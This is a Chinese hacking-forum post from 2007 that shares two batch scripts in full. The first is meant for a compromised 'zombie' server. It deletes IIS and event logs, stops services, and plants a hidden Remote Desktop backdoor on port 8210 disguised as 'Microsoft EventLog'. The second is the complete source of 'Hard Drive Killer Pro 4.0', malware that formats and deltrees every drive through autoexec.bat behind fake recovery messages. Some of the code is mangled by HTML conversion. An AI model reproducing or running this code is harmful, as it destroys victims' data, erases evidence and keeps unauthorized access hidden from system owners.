|
楼主 |
发表于 2007-1-19 03:14:35
|
显示全部楼层
<font size="2">下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnal service留跳后路。 <br/>@regedit /s patch.dll <br/>@net stop w3svc <br/>@net stop event log <br/>@del c://winnt//system32//logfiles//w3svc1//*.* /f /q <br/>@del c://winnt//system32//logfiles//w3svc2//*.* /f /q <br/>@del c://winnt//system32//config//*.event /f /q <br/>@del c://winnt//system32dtclog//*.* /f /q <br/>@del c://winnt//*.txt /f /q <br/>@del c://winnt//*.log /f /q <br/>@net start w3svc <br/>@net start event log <br/>@rem [删除日志] <br/><br/><br/>@net stop lanmanserver /y <br/>@net stop Schedule /y <br/>@net stop RemoteRegistry /y <br/>@del patch.dll <br/>@echo The server has been patched,Have fun. <br/>@del patch.bat <br/>@REM [禁止一些危险的服务。] <br/><br/>@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] >>patch.dll <br/>@echo "ortNumber"=dword:00002010 >>patch.dll <br/>@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp >>patch.dll <br/>@echo "ortNumber"=dword:00002012 >>patch.dll <br/>@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermDD] >>patch.dll <br/>@echo "Start"=dword:00000002 >>patch.dll <br/>@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//SecuService] >>patch.dll <br/>@echo "Start"=dword:00000002 >>patch.dll <br/>@echo "ErrorControl"=dword:00000001 >>patch.dll <br/>@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,// >>patch.dll <br/>@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,// >>patch.dll <br/>@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll <br/>@echo "ObjectName"="LocalSystem" >>patch.dll <br/>@echo "Type"=dword:00000010 >>patch.dll <br/>@echo "Description"="Keep record of the program and windows message。" >>patch.dll <br/>@echo "DisplayName"="Microsoft EventLog" >>patch.dll <br/>@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >>patch.dll <br/>@echo "Start"=dword:00000004 >>patch.dll <br/>@copy c://winnt//system32//termsrv.exe c://winnt//system32//eventlog.exe <br/>@REM [修改3389连接,端口为8210(十六进制为00002012),名称为Microsoft EventLog,留条后路] <br/><br/>3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) <br/>------------------------ cut here then save as .bat or .cmd file --------------------------- <br/>@echo off <br/>rem This program is dedecated to a very special person that does not want to be named. <br/>:start <br/>cls <br/>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <br/>call attrib -r -h c://autoexec.bat >nul <br/>echo @echo off >c://autoexec.bat <br/>echo call format c: /q /u /autoSample >nul >>c://autoexec.bat <br/>call attrib +r +h c://autoexec.bat >nul <br/>rem Drive checking and assigning the valid drives to the drive variable. <br/><br/>set drive= <br/>set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z <br/><br/>rem code insertion for Drive Checking takes place here. <br/>rem drivechk.bat is the file name under the root directory. <br/>rem As far as the drive detection and drive variable settings, dont worry about how it <br/>rem works, its d//*amn to complicated for the average or even the expert batch programmer. <br/>rem Except for Tom Lavedas. <br/><br/>echo @echo off >drivechk.bat <br/>echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat <br/>%comspec% /e:2048 /c {t}.bat >>drivechk.bat <br/>del {t}.bat <br/>echo if errorlevel 1 goto enddc >>drivechk.bat <br/><br/>cls <br/>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <br/><br/>rem When errorlevel is 1, then the above is not true, if 0, then its true. <br/>rem Opposite of binary rules. If 0, it will elaps to the next command. <br/><br/>echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.///ad/w/-p $b find "bytes" > nul >{t}.bat <br/>%comspec% /e:2048 /c {t}.bat >>drivechk.bat <br/>del {t}.bat <br/>echo if errorlevel 1 goto enddc >>drivechk.bat <br/><br/>cls <br/>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <br/><br/>rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. <br/>rem if errorlevel is 0, then it will elaps to the next command. <br/><br/>echo @prompt dir %%%%1:.///ad/w/-p $b find " 0 bytes free" > nul >{t}.bat <br/>%comspec% /e:2048 /c {t}.bat >>drivechk.bat <br/>del {t}.bat <br/>echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat <br/><br/>cls <br/>echo PLEASE WAIT WHILE PROGRAM LOADS . . . <br/><br/>rem if its errorlevel 1, then the specified drive is a hard or floppy drive. <br/>rem if its not errorlevel 1, then the specified drive is a CD-ROM drive. <br/><br/>echo :enddc >>drivechk.bat <br/><br/>rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". <br/><br/>rem Now we will use the program drivechk.bat to attain valid drive information. <br/><br/>:Sampledrv <br/><br/>for %%a in (%alldrive%) do call drivechk.bat %%a >nul <br/>del drivechk.bat >nul <br/>if %drive.==. set drive=c <br/><br/>:form_del <br/>call attrib -r -h c://autoexec.bat >nul <br/>echo @echo off >c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) do call c://temp.bat %%%%a Bunga >nul >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) call deltree /y %%%%a:// >nul >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autoSample >nul >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) do call c://temp.bat %%%%a Bunga >nul >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c://autoexec.bat <br/>echo for %%%%a in (%drive%) call deltree /y %%%%a:// >nul >>c://autoexec.bat <br/>echo cd// >>c://autoexec.bat <br/>echo cls >>c://autoexec.bat <br/>echo echo Welcome to the land of death. Munga Bungas Multiple Hard Drive Killer version 4.0. >>c://autoexec.bat <br/>echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c://autoexec.bat <br/>echo echo 1. To make people aware that security should not be taken for granted. >>c://autoexec.bat <br/>echo echo 2. Love is important, if you have it, truly, dont let go of it like I did! >>c://autoexec.bat <br/>echo echo 3. If you are NOT a vegetarian, then you are a murderer, and Im glad your HD is dead. >>c://autoexec.bat <br/>echo echo 4. Dont support the following: War, Racism, Drugs and the Liberal Party.>>c://autoexec.bat <br/><br/>echo echo. >>c://autoexec.bat <br/>echo echo Regards, >>c://autoexec.bat <br/>echo echo. >>c://autoexec.bat <br/>echo echo Munga Bunga >>c://autoexec.bat <br/>call attrib +r +h c://autoexec.bat <br/><br/>kedir <br/>if exist c://temp.bat attrib -r -h c://temp.bat >nul <br/>echo @echo off >c://temp.bat <br/>echo %%1:// >>c://temp.bat <br/>echo cd// >>c://temp.bat <br/>echo :startmd >>c://temp.bat <br/>echo for %%%%a in ("if not exist %%2//nul md %%2" "if exist %%2//nul cd %%2") do %%%%a >>c://temp.bat <br/>echo for %%%%a in (">ass_hole.txt") do echo %%%%a Your Gone @$$hole!!!! >>c://temp.bat <br/>echo if not exist %%1://%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//%%2//nul goto startmd >>c://temp.bat <br/>call attrib +r +h c://temp.bat >nul <br/><br/>cls <br/>echo Initializing variables . . . <br/>rem deltree /y %%a://*. only eliminates directories, hence leaving the file created above for further destruction. <br/>for %%a in (%drive%) do call format %%a: /q /u /autoSample >nul <br/>cls <br/>echo Initializing variables . . . <br/>echo Validating Data . . . <br/>for %%a in (%drive%) do call c://temp.bat %%a Munga >nul <br/>cls <br/>echo Initializing variables . . . <br/>echo Validating Data . . . <br/>echo Analyzing System Structure . . . <br/>for %%a in (%drive%) call attrib -r -h %%a:// /S >nul <br/>call attrib +r +h c://temp.bat >nul <br/>call attrib +r +h c://autoexec.bat >nul <br/>cls <br/>echo Initializing variables . . . <br/>echo Validating Data . . . <br/>echo Analyzing System Structure . . . <br/>echo Initializing Application . . . <br/><br/>for %%a in (%drive%) call deltree /y %%a://*. >nul <br/>cls <br/>echo Initializing variables . . . <br/>echo Validating Data . . . <br/>echo Analyzing System Structure . . . <br/>echo Initializing Application . . . <br/>echo Starting Application . . . <br/>for %%a in (%drive%) do call c://temp.bat %%a Munga >nul <br/><br/>cls <br/>echo Thank you for using a Munga Bunga product. <br/>echo. <br/>echo Oh and, Bill Gates rules, and he is not a geek, he is a good looking genius. <br/>echo. <br/>echo Here is a joke for you . . . <br/>echo. <br/>echo Q). Whats the worst thing about being an egg? <br/>echo A). You only get laid once. <br/>echo. <br/>echo HAHAHAHA, get it? Dont you just love that one? <br/>echo. <br/>echo Regards, <br/>echo. <br/>echo Munga Bunga <br/><br/>:end <br/><br/>rem Hard Drive Killer Pro Version 4.0, enjoy!!!! <br/>rem Author: Munga Bunga - from Australia, the land full of retarded Australians (help me get out of here).</font><br/> |
|